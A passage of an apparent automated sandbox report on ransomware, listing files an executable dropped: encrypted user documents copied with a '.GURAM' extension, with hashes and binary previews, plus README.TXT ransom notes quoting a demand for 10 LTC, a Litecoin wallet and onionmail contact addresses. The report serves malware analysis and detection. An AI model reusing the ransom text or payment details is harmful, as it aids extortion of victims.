                                                                                                                                                                                                                                                Preview:......./..k.an..Y.T.A.....Q....MX.v&..{..........j....3..E....Pr._..;....68....b......gN7.aIC.......(~,3J../.....-...7...[.f.....g...2v.;tY6.G..B)n...a._....z.p ;e.......x.Z5.....7.;..z....A....S!f.a}..m..j.6.2|r.j......_..liPO;.NJ.e..I.....JTY../ONm.?....am^z7#..~.,~s~............../....s...Se....V.-.!.S....p...(.qV...}.Zl0~....y!K<:..,...".{....(....Zk...v6...h.$9.qi.K..@....>_.u.V..@.q._.J..N..5....c....+..m .0..H!2.x.m..M e.'.../....u)..Ie.....~GTP.......XLfb{..1...F.].7.t).j5EQ@2.}..[4...Z.W.f}d...#2..........W...WI.D......./J...F.....`.u.1.#..pf)9......L..X.M.r...].Ya.H.."&.'.2...+W..m....He..).L.i.[.....P...L/.@;./....ZtZ2.X.`.eu{...UoDJ......../.a%......2....40.]...........sN.......*.....6.....P..B...S.DWj..0.(K...MF.r*5..l.2.^....r...>\Cf.7C.g.Pz.[.7.. .q.w...>..{.@nv.......%..1..HG...i...u?@I.....2.kU......\....Y"...(....:..C.9.j...c./S...$.>....\..u.o..P..G......JM...r.....If9H.e;..t.S(.....Y..JF.W.&U:6F.QI....O..5D_..{"-...

                                                                                                                                                                                                                                                C:\Users\user\Documents\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
                                                                                                                                                                                                                                                MD5:81D185495B4E6430A87DFD37789BB872
                                                                                                                                                                                                                                                SHA1:B5DA653F81A548C74205C7AE3D19F30AF1A14271
                                                                                                                                                                                                                                                SHA-256:838D654B9CB0360D8B3BB767DB8FC1954FC41BA0A56FC34688AAD9B50F5DDB40
                                                                                                                                                                                                                                                SHA-512:1106C9C2245CBD44EFFB42E4E1365EB796D3B2390B011FB97205550BF183B097C489194AA001F97F949E9D1ED1C970EEA6CBB0477DA47511E5BC18E88BF2DFA5
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:Your files are encrypted. To decrypt files you need to pay 10 LTC = 1000 $......You need to send cryptocurrency 10 LTC=1000$ to the address....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9....ltc1qdwectzwfhuap0q9xsqh7t433568py527vxvtq9......You have 24 hours to send proof of payment to payfast1000@onionmail.org..payfast2000@onionmail.org....If you need a test file. It will cost 1LTC=100 $......If 24 hours pass and you do not pay, the cost of restoring your files will cost $2000-10000

                                                                                                                                                                                                                                                C:\Users\user\Documents\UMMBDNEQBN.docx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.870050305987104
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JEUqKJj+Nz2gKu9LClAI4o/3xqHTYrrB4XNjmJrc0YXUZtwsT9:Jrq5IScAI4eFXmV4o0jZtw2
                                                                                                                                                                                                                                                MD5:E0C63D44B931118DB3ACDFC849925EBD
                                                                                                                                                                                                                                                SHA1:9EB6E2441DB9312A12AB726BAA9D8BA343D051A5
                                                                                                                                                                                                                                                SHA-256:DE37DC22A85E9DEC4CB8BF6149842859D39F4AF743F1ED006F1828AB81D7F6D9
                                                                                                                                                                                                                                                SHA-512:65B102755F49B944BC681B55F8B184E1195C83E7F84C361C48BC4CFEE55426F94FA0FD4ADE1640BE64547D5DD1377480571330B6B81ECA71C73E4B2266154FBA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:. ....J...?..A.?......gv3.3._.CC...K...[.1..v4..x+..........Q...^......1.(G'.G.....1&>X.&w..SG.0...j..."k...E^..._.^R..G.U3.|......}.p....Q+.Zg.hu...A=..g........*.HL.|..l.M.%..1...6vX..uzt:.KW(..m.@..`.5..@..m....L..s........>..%.6....K.8*Z..}l..P.g.V.9V./.Q..Pt......{.B..-.....-#l.....D6{U."M.o.$.C.vJ.[..W$./.....A......m.KZ.y....Mp..m.......@U..Z.y... ..n).....z...yN.\(L...o.Sx..h.s...C....u.cs.e.........q_8.uk...|...T....@.4.I..A.....Qh4.....x.:.{..y .....6v.A..1..- ..:.C.I"...6.B...X..}.B_...i.#_RXl.&#k.k......z...l.a.,.d1.)'.!.y.+./. .o......MJ[._|.L....*!*..~G.M..;.'.k......}.xaF,...7..R.....s!....J/.].(.{.W.iq..!"...n..!@...L....`.......6\".G.]..E+xc.?>!._..N ..k9H.8z..o.........|.......c..M9KY..".czc...|X..W".F..L.&..9.4...J.L..u.b.0<.2.......*U.7%.:).l.v.........V...H1.x....s.#X......\...^M.S.....Im\>..DV.w..8+.qv.9...!.L.L.......y....RD*p.9.__..x..zP.J....F..G.v...;..`i......z#A. CM.D-...d...).S$..Venp**.7..Gk.@...F...J.Z1.=D..

                                                                                                                                                                                                                                                C:\Users\user\Documents\UMMBDNEQBN.docx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.870050305987104
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:JEUqKJj+Nz2gKu9LClAI4o/3xqHTYrrB4XNjmJrc0YXUZtwsT9:Jrq5IScAI4eFXmV4o0jZtw2
                                                                                                                                                                                                                                                MD5:E0C63D44B931118DB3ACDFC849925EBD
                                                                                                                                                                                                                                                SHA1:9EB6E2441DB9312A12AB726BAA9D8BA343D051A5
                                                                                                                                                                                                                                                SHA-256:DE37DC22A85E9DEC4CB8BF6149842859D39F4AF743F1ED006F1828AB81D7F6D9
                                                                                                                                                                                                                                                SHA-512:65B102755F49B944BC681B55F8B184E1195C83E7F84C361C48BC4CFEE55426F94FA0FD4ADE1640BE64547D5DD1377480571330B6B81ECA71C73E4B2266154FBA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:. ....J...?..A.?......gv3.3._.CC...K...[.1..v4..x+..........Q...^......1.(G'.G.....1&>X.&w..SG.0...j..."k...E^..._.^R..G.U3.|......}.p....Q+.Zg.hu...A=..g........*.HL.|..l.M.%..1...6vX..uzt:.KW(..m.@..`.5..@..m....L..s........>..%.6....K.8*Z..}l..P.g.V.9V./.Q..Pt......{.B..-.....-#l.....D6{U."M.o.$.C.vJ.[..W$./.....A......m.KZ.y....Mp..m.......@U..Z.y... ..n).....z...yN.\(L...o.Sx..h.s...C....u.cs.e.........q_8.uk...|...T....@.4.I..A.....Qh4.....x.:.{..y .....6v.A..1..- ..:.C.I"...6.B...X..}.B_...i.#_RXl.&#k.k......z...l.a.,.d1.)'.!.y.+./. .o......MJ[._|.L....*!*..~G.M..;.'.k......}.xaF,...7..R.....s!....J/.].(.{.W.iq..!"...n..!@...L....`.......6\".G.]..E+xc.?>!._..N ..k9H.8z..o.........|.......c..M9KY..".czc...|X..W".F..L.&..9.4...J.L..u.b.0<.2.......*U.7%.:).l.v.........V...H1.x....s.#X......\...^M.S.....Im\>..DV.w..8+.qv.9...!.L.L.......y....RD*p.9.__..x..zP.J....F..G.v...;..`i......z#A. CM.D-...d...).S$..Venp**.7..Gk.@...F...J.Z1.=D..

                                                                                                                                                                                                                                                C:\Users\user\Documents\UMMBDNEQBN.xlsx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.856951244610924
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:GJV8I/Ti0hCp5AwEMDvV7mioWDLtQRQoazdShMRxFC64Z4jmJrc0YXUZtwsTbDr:ZkZCUN07mlgthoCdShMRa64M4o0jZtws
                                                                                                                                                                                                                                                MD5:2CAA8154221B911D5D2759D66A17A2B3
                                                                                                                                                                                                                                                SHA1:44F22F25A8FA5F02F9203BAD219A54F087F58CF0
                                                                                                                                                                                                                                                SHA-256:646839474CE8C5D03F23772474655523A21C54B22A76EC777374397D1E1A6670
                                                                                                                                                                                                                                                SHA-512:8707FFBD7917C3029847DAABF5EE46EFDB71A6F95618EACC16084EBC4C11A52A35CCB8DBDBFAFD84C0BD72B22607E5928DA6B2CAD1574CE144EB572B5872BFFA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..m..F........"_.uR;Ny.;...D....r.....\>.V..G..3.r...xC.H6...!..[...F...]...{.vf-.g.....P....[g.b..(...."..#!..f.a....[.#6.,......c~-i...w..Mkq...]../.#...U.+.0z.g..*.0;......hV.;..gp.QK..HH2..U.1..5C..'......p.t.@..c_e...7.oR.=\....&B...O.....V.8..]...t..i.... ...s|...E.R....H...Y}.4k(oL.E.....H@....5..Qx....o.)....sZ..........Y.....F....=..X..k. -.Ah.;...R/.GV..7BeR.....cv.. +.)...im..=M.p.`.../er:...hkM..'.e2...U...0.-..T..N..n.".-...m..t.\[.g..j...u....S.v...x...3n..\..|....c....c...E........./...........:v.K j..f..:...;M .....<.....!i....`(....%....Z_JC......Z...:.g.....u,0....."..8s..H..K..Jf.?S.y..U..........X..w.3E..`...'..rFO5...........2..."W......Hf...Z#5.Q.Z2'......G...p...Q.....NJ.yzA....E.t..T.l.........t=&...1_../..s.%.|:..-.tm.p..5..S..".p.s..../:K.%...t..[1..A..x...@.l .O(.C=...O....%.....BF.....L...Z..|l....<P:.........W@........Rq."....>e.c.......%a..A/y....)F^N....E....[..r....-..+..pf..tA;....'...ZQ....h'.

                                                                                                                                                                                                                                                C:\Users\user\Documents\UMMBDNEQBN.xlsx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.856951244610924
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:GJV8I/Ti0hCp5AwEMDvV7mioWDLtQRQoazdShMRxFC64Z4jmJrc0YXUZtwsTbDr:ZkZCUN07mlgthoCdShMRa64M4o0jZtws
                                                                                                                                                                                                                                                MD5:2CAA8154221B911D5D2759D66A17A2B3
                                                                                                                                                                                                                                                SHA1:44F22F25A8FA5F02F9203BAD219A54F087F58CF0
                                                                                                                                                                                                                                                SHA-256:646839474CE8C5D03F23772474655523A21C54B22A76EC777374397D1E1A6670
                                                                                                                                                                                                                                                SHA-512:8707FFBD7917C3029847DAABF5EE46EFDB71A6F95618EACC16084EBC4C11A52A35CCB8DBDBFAFD84C0BD72B22607E5928DA6B2CAD1574CE144EB572B5872BFFA
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..m..F........"_.uR;Ny.;...D....r.....\>.V..G..3.r...xC.H6...!..[...F...]...{.vf-.g.....P....[g.b..(...."..#!..f.a....[.#6.,......c~-i...w..Mkq...]../.#...U.+.0z.g..*.0;......hV.;..gp.QK..HH2..U.1..5C..'......p.t.@..c_e...7.oR.=\....&B...O.....V.8..]...t..i.... ...s|...E.R....H...Y}.4k(oL.E.....H@....5..Qx....o.)....sZ..........Y.....F....=..X..k. -.Ah.;...R/.GV..7BeR.....cv.. +.)...im..=M.p.`.../er:...hkM..'.e2...U...0.-..T..N..n.".-...m..t.\[.g..j...u....S.v...x...3n..\..|....c....c...E........./...........:v.K j..f..:...;M .....<.....!i....`(....%....Z_JC......Z...:.g.....u,0....."..8s..H..K..Jf.?S.y..U..........X..w.3E..`...'..rFO5...........2..."W......Hf...Z#5.Q.Z2'......G...p...Q.....NJ.yzA....E.t..T.l.........t=&...1_../..s.%.|:..-.tm.p..5..S..".p.s..../:K.%...t..[1..A..x...@.l .O(.C=...O....%.....BF.....L...Z..|l....<P:.........W@........Rq."....>e.c.......%a..A/y....)F^N....E....[..r....-..+..pf..tA;....'...ZQ....h'.

                                                                                                                                                                                                                                                C:\Users\user\Documents\VLZDGUKUTZ.docx

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.861166059891472
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:L06tEuVvzHe1T7uM1hBKgqIabi4o0jZtwtZ:Lnvz+97uM1hwgqXb/letZ
                                                                                                                                                                                                                                                MD5:3DAC5A20AACB6F9E31851D880313AA99
                                                                                                                                                                                                                                                SHA1:D85CD76C16FD09BC31EAA113B560BD3C27344E54
                                                                                                                                                                                                                                                SHA-256:5BCE29DE03AC54D814B63DE1D9CE58E363AFFE11BCDC9A471C7692D02A71713B
                                                                                                                                                                                                                                                SHA-512:A8EB7368EE13C8B9DA4CE33F97948C2AD43FA0A5F67E20E7410C3C4B1103E4C3803DC830496D87CEA049B3E2C0AB6493532FFE175106186998F5E4C23300598D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.".Y.`..........<.Y./....0Uj.._#..Q...[..>.n:.......AG..E......P...U..Z...rj...).C>....`.....wE1V.x;Z..Y7;...#.I..P..['.1..)...2[?.b.&.......?.I.d....r..]4.....c$..q....../..~...4.........9c..*.....F.k.z.....>.)..z.7.Fd..x..o..tz......\Q.j..[..L..O.tT..TR..-..K..+f=.>..WI.-(j.Xe`.7.T..S.V#z.SY.....:z...K....u.Qw....h....c].,)......~..t......p.P......_).N...iH.....]!.{P......o.j.I...=0S..p.5y......s..de..[9........tyy.U+CA.<2.m.E....b..@....a..%..M.r.)....:Y.T$A.p...|I..F.....8..C4..:.6q)....(1...H.........."#....aV,.>....3e.4......~4.fT....3.`N...>..[.*wp....}.1M..I...O..*9.......8.U..4.....V.W...D.......o.k'....TfA.r.i.+...........=.I9.......e..........f...`F.-.....#.......L....p\....[..rpv.C.z.T...PX....F..E...i%3.ck.Pl.)............;cG%..Ki....*..~A..X4.&...P....ZFs..M.......@ ....RY.Su..$;U{...........eK...%. ..9.2...$}..s..B.V,..`...q.]....A..=.&x.a.IP..b!.._....p.P..EY..5A.Qu.... ....fa,.....F..g.b.mk.1../T<..g..d1.Z....C.J.

                                                                                                                                                                                                                                                C:\Users\user\Documents\VLZDGUKUTZ.docx.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.861166059891472
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:L06tEuVvzHe1T7uM1hBKgqIabi4o0jZtwtZ:Lnvz+97uM1hwgqXb/letZ
                                                                                                                                                                                                                                                MD5:3DAC5A20AACB6F9E31851D880313AA99
                                                                                                                                                                                                                                                SHA1:D85CD76C16FD09BC31EAA113B560BD3C27344E54
                                                                                                                                                                                                                                                SHA-256:5BCE29DE03AC54D814B63DE1D9CE58E363AFFE11BCDC9A471C7692D02A71713B
                                                                                                                                                                                                                                                SHA-512:A8EB7368EE13C8B9DA4CE33F97948C2AD43FA0A5F67E20E7410C3C4B1103E4C3803DC830496D87CEA049B3E2C0AB6493532FFE175106186998F5E4C23300598D
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:.".Y.`..........<.Y./....0Uj.._#..Q...[..>.n:.......AG..E......P...U..Z...rj...).C>....`.....wE1V.x;Z..Y7;...#.I..P..['.1..)...2[?.b.&.......?.I.d....r..]4.....c$..q....../..~...4.........9c..*.....F.k.z.....>.)..z.7.Fd..x..o..tz......\Q.j..[..L..O.tT..TR..-..K..+f=.>..WI.-(j.Xe`.7.T..S.V#z.SY.....:z...K....u.Qw....h....c].,)......~..t......p.P......_).N...iH.....]!.{P......o.j.I...=0S..p.5y......s..de..[9........tyy.U+CA.<2.m.E....b..@....a..%..M.r.)....:Y.T$A.p...|I..F.....8..C4..:.6q)....(1...H.........."#....aV,.>....3e.4......~4.fT....3.`N...>..[.*wp....}.1M..I...O..*9.......8.U..4.....V.W...D.......o.k'....TfA.r.i.+...........=.I9.......e..........f...`F.-.....#.......L....p\....[..rpv.C.z.T...PX....F..E...i%3.ck.Pl.)............;cG%..Ki....*..~A..X4.&...P....ZFs..M.......@ ....RY.Su..$;U{...........eK...%. ..9.2...$}..s..B.V,..`...q.]....A..=.&x.a.IP..b!.._....p.P..EY..5A.Qu.... ....fa,.....F..g.b.mk.1../T<..g..d1.Z....C.J.

                                                                                                                                                                                                                                                C:\Users\user\Documents\WUTJSCBCFX.jpg

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.874168149675802
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:b4Ko3F61g8s3IW0tK1F2NymhUdBldXdm2cRy7iwg6c9xjmJrc0YXUZtwsT5B:b4Kceg82T0tKJmSdBbnban4o0jZtwY
                                                                                                                                                                                                                                                MD5:A5F97E83243F9032422FAA5ADE731BD6
                                                                                                                                                                                                                                                SHA1:59BD4110EC1F69DAD678F7C83837EFFD539438DA
                                                                                                                                                                                                                                                SHA-256:A2BDFD4AD4F41052E400DB03CF00CDE07F524933065C00DD41AE222ED246405C
                                                                                                                                                                                                                                                SHA-512:4D70201D93B293A97C7F9B7875D764DD60EF6E6B731E51F7358E195C466BA0B865E70ED52ACC10A822CE3B1FAD1904E6FA1947D9F33B874F03F0FF4710F8C7CD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..hiK.'x.....X.m.@...O. g..).;B.t.u".N..$."a|.L....7Y.t[q.......a..w..oo.G.Z#..,........7....}^.F0~.J...\...qHT..A....P..._7.L......IUFU..2.-.j...Y.u..h@..S.M..7E......c..PH......j.$..!......Wtc..v..s|.]..K.T...WU...5.. .j.I7e...m.E.Qdh...3...!..-c..StZ.yVy..<....T.B:b.....j8.z.A.{^...z......K..Bk...*u.......e...Niz..j.Ld..NB..4.F...&.DJDWP..7....1...!..."|.U.I..;KN./t..s.<......BJR......2..|...\.*..,...olX.w|..5.d.Z.]...&C.I..r....t.....a.....fn/h....../p#.T>R..?;2...>:..._,...(..$....A.....]..P)...g=H.... ..8.DH.....(A.3.zd.l..wP.P.5.........+..2Z,c..P........E5...!.......N....e...n8..a...O..d9....IG..'^..f...U. .]`.JC.o)..w...S..h:.!bo\.&..,yA..%.R.X....S.U.F.INt..\.......fb3.q]D.....\3x..c..%.k.#+.Z......R...k.>.K.Ui.<gT..t...h^9.tJ.V9.(...Q.Nj[.t...'...........k9.\..<0.K......o\..+....I..h..[..iI].o....o../.....2..w..Y.D...z.f...V*m.(..#..e.u..+9.l#i.#U9B.p..6....}..;cI..,.9<.....-.)-)..~..]k..SL...N.._...AU.ff.....+.;...

                                                                                                                                                                                                                                                C:\Users\user\Documents\WUTJSCBCFX.jpg.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.874168149675802
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:b4Ko3F61g8s3IW0tK1F2NymhUdBldXdm2cRy7iwg6c9xjmJrc0YXUZtwsT5B:b4Kceg82T0tKJmSdBbnban4o0jZtwY
                                                                                                                                                                                                                                                MD5:A5F97E83243F9032422FAA5ADE731BD6
                                                                                                                                                                                                                                                SHA1:59BD4110EC1F69DAD678F7C83837EFFD539438DA
                                                                                                                                                                                                                                                SHA-256:A2BDFD4AD4F41052E400DB03CF00CDE07F524933065C00DD41AE222ED246405C
                                                                                                                                                                                                                                                SHA-512:4D70201D93B293A97C7F9B7875D764DD60EF6E6B731E51F7358E195C466BA0B865E70ED52ACC10A822CE3B1FAD1904E6FA1947D9F33B874F03F0FF4710F8C7CD
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..hiK.'x.....X.m.@...O. g..).;B.t.u".N..$."a|.L....7Y.t[q.......a..w..oo.G.Z#..,........7....}^.F0~.J...\...qHT..A....P..._7.L......IUFU..2.-.j...Y.u..h@..S.M..7E......c..PH......j.$..!......Wtc..v..s|.]..K.T...WU...5.. .j.I7e...m.E.Qdh...3...!..-c..StZ.yVy..<....T.B:b.....j8.z.A.{^...z......K..Bk...*u.......e...Niz..j.Ld..NB..4.F...&.DJDWP..7....1...!..."|.U.I..;KN./t..s.<......BJR......2..|...\.*..,...olX.w|..5.d.Z.]...&C.I..r....t.....a.....fn/h....../p#.T>R..?;2...>:..._,...(..$....A.....]..P)...g=H.... ..8.DH.....(A.3.zd.l..wP.P.5.........+..2Z,c..P........E5...!.......N....e...n8..a...O..d9....IG..'^..f...U. .]`.JC.o)..w...S..h:.!bo\.&..,yA..%.R.X....S.U.F.INt..\.......fb3.q]D.....\3x..c..%.k.#+.Z......R...k.>.K.Ui.<gT..t...h^9.tJ.V9.(...Q.Nj[.t...'...........k9.\..<0.K......o\..+....I..h..[..iI].o....o../.....2..w..Y.D...z.f...V*m.(..#..e.u..+9.l#i.#U9B.p..6....}..;cI..,.9<.....-.)-)..~..]k..SL...N.._...AU.ff.....+.;...

                                                                                                                                                                                                                                                C:\Users\user\Documents\ZBEDCJPBEY.mp3

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.883407354443615
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:xwzj8NEadxTYUNxAJ+m5OZwfj/JFwcqCiS2N+0ZAUZcPvjmJrc0YXUZtwsT1+h:aYEadxv6L9LJFHRiSK+DL4o0jZtwXh
                                                                                                                                                                                                                                                MD5:150D6F14B7AE1549E0843D8A0EEA0B80
                                                                                                                                                                                                                                                SHA1:D1EE69A71BEB05F14C9BE64038D73F3E997D4CC4
                                                                                                                                                                                                                                                SHA-256:46C3EBAFE74ED4E023552BFC3951FFBC2EA8F6875C213D76A6495D578E0ECF25
                                                                                                                                                                                                                                                SHA-512:20A14214DA8CFE9797F8CA29A56519CFBB64230568B305B83DB71F654F89FC4EDE342523D890D840E937A81D918A8242FFDB88E72F66ED3000D58226D7EBBA54
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..l.7..[...Q...R'.2.+...A....~F...c....Y.p..l........z.O?.=p..4.aI:.y^.[.. .+.+.OZ.a.6....O...3.........P...\....,.~.....C..T..S.....[.....2..f.:..|y.y).u5{....>.2..Kb...k.DYX"-.U....b....q..K..u....U...E)~..tG.g....<..B..N...R.G7r......#..).ycE`.8.p..k8F5..O7H....^f.6@... TJ............3..........3..i..IF....[...fk.F..k.k. ..5......B"...h..g.z@.....v....w..'.!.^....XA.02.....k~8.{dj..bd.{.}1.CT..~l..'.w./.d.e..b..@h..`.2..X4.d.....{l..4.{+.e..*..uQ.b.3..C`nl.5.o.W;i....z..P.G...*.S....e......R$...@z.|.y.'7D..X..co.X#2..M'......&.z.Q..@................G.N.H...0..r..E.L,=M....~.5..q..ub.*..........+........?...9......=..F...T y.t..].&..c.'.!O..p.^-.1-;....U.F`.<".!l0uU...,,... GA...c]E.M..H....p.;|:.P....zW...B....Y.H.&.S..c6..........6.>......z....R.y...Q.N...,. ...9>c.(...^*.\.......Q....+.d....>q......&...@.E....I.oE....u..<..L!..rH\.W..9.!G&\.$...l.F...>.JR.o+_..(5:H.-.!..}.w.@...(..7.......{X...Hv.&#Z..?.^.l.9_...oK..T..."....K..7..m.T..T

                                                                                                                                                                                                                                                C:\Users\user\Documents\ZBEDCJPBEY.mp3.{BB5EFC24-51A9-DB6D-27DC-3EA48BD33F86}.GURAM (copy)

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1634
                                                                                                                                                                                                                                                Entropy (8bit):7.883407354443615
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24:xwzj8NEadxTYUNxAJ+m5OZwfj/JFwcqCiS2N+0ZAUZcPvjmJrc0YXUZtwsT1+h:aYEadxv6L9LJFHRiSK+DL4o0jZtwXh
                                                                                                                                                                                                                                                MD5:150D6F14B7AE1549E0843D8A0EEA0B80
                                                                                                                                                                                                                                                SHA1:D1EE69A71BEB05F14C9BE64038D73F3E997D4CC4
                                                                                                                                                                                                                                                SHA-256:46C3EBAFE74ED4E023552BFC3951FFBC2EA8F6875C213D76A6495D578E0ECF25
                                                                                                                                                                                                                                                SHA-512:20A14214DA8CFE9797F8CA29A56519CFBB64230568B305B83DB71F654F89FC4EDE342523D890D840E937A81D918A8242FFDB88E72F66ED3000D58226D7EBBA54
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                                Preview:..l.7..[...Q...R'.2.+...A....~F...c....Y.p..l........z.O?.=p..4.aI:.y^.[.. .+.+.OZ.a.6....O...3.........P...\....,.~.....C..T..S.....[.....2..f.:..|y.y).u5{....>.2..Kb...k.DYX"-.U....b....q..K..u....U...E)~..tG.g....<..B..N...R.G7r......#..).ycE`.8.p..k8F5..O7H....^f.6@... TJ............3..........3..i..IF....[...fk.F..k.k. ..5......B"...h..g.z@.....v....w..'.!.^....XA.02.....k~8.{dj..bd.{.}1.CT..~l..'.w./.d.e..b..@h..`.2..X4.d.....{l..4.{+.e..*..uQ.b.3..C`nl.5.o.W;i....z..P.G...*.S....e......R$...@z.|.y.'7D..X..co.X#2..M'......&.z.Q..@................G.N.H...0..r..E.L,=M....~.5..q..ub.*..........+........?...9......=..F...T y.t..].&..c.'.!O..p.^-.1-;....U.F`.<".!l0uU...,,... GA...c]E.M..H....p.;|:.P....zW...B....Y.H.&.S..c6..........6.>......z....R.y...Q.N...,. ...9>c.(...^*.\.......Q....+.d....>q......&...@.E....I.oE....u..<..L!..rH\.W..9.!G&\.$...l.F...>.JR.o+_..(5:H.-.!..}.w.@...(..7.......{X...Hv.&#Z..?.^.l.9_...oK..T..."....K..7..m.T..T

                                                                                                                                                                                                                                                C:\Users\user\Downloads\README.TXT

                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1014798001\4ZD5C3i.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):533
                                                                                                                                                                                                                                                Entropy (8bit):5.031419779234036
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12:EeEeC9tYe8jFkMxvnvnJJfou4l+v5jl+vmPUo4oiIn:Ede+VpMxfffouCQLQtfdI
